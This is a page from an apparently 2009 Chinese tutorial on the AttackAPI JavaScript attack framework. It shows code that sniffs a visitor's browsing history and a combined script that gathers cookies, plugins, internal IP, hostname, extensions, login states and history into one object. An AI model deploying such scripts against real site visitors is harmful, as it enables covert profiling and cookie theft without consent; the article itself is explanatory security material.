WEB开发网
开发学院网络安全安全技术 精通JavaScript攻击框架:AttackAPI(上) 阅读

精通JavaScript攻击框架:AttackAPI(上)

 2009-02-13 13:55:19 来源:WEB开发网   
核心提示: 欲了解如何为scanExtensios和scanStates函数编写特征码的更多信息,请访问AttackAPI主页,精通JavaScript攻击框架:AttackAPI(上)(7),地址为www.gnucitizen.org/projects/attackapi,迄今为止,人们可以扫描大量

欲了解如何为scanExtensios和scanStates函数编写特征码的更多信息,请访问AttackAPI主页,地址为www.gnucitizen.org/projects/attackapi。

迄今为止,我们已经看到即使对AttackAPI的工作原理没有深入了解,也可以轻松地用它来完成的许多任务。我们这里要展示的最后一个函数将用来显示客户端浏览历史。让我们看看以下代码:

$A.scanHistory({onfound: function(url) {
console.log(url);
}});

通过上述代码,就可以查看最近访问的位于AttackAPI特征数据库中所有站点。就像其他扫描函数一样,您可以指定自己的要扫描的浏览历史列表,如下所示:

$A.scanHistory({onfound: function(url) {
console.log(url);
}, urls: [‘http://www.google.com’, ‘http://www.gnucitizen.org’]});

需要注意的是,虽然攻击者可以将该技术用于恶意目的,但是有些情况下它也有好的一面。例如,为了调查取证,人们可以扫描大量用户以识别访问过可疑站点的个人。

让我们看看如何使用上面所有这些函数来对用户进行全面的调查。在代码片断之后,我们还列出了收集到的各种信息:

var data = {
agent: $A.getAgent(),
platform: $A.getPlatform(),
cookies: $A.getCookies(),
plugins: $A.getPlugins(),
ip: $A.getInternalIP(),
hostname: $A.getInternalHostname(),
extensions: [],
states: [],
history: []};
var completed = 0;
$A.scanExtensions({
onfound: function (signature) {
data.extensions.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanStates({
onfound: function (signature) {
data.states.push(signature.name);
},
oncomplete: function () {
completed += 1;
}
});
$A.scanHistory({
onfound: function (url) {
data.history.push(url);
},
oncomplete: function () {
completed += 1;
}
});
var tmr = window.setInterval(function () {
if (completed < 3)
return;
console.dir(data);
window.clearInterval(tmr);
}, 1000);

上一页  2 3 4 5 6 7 8 9  下一页

Tags:精通 JavaScript 攻击

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接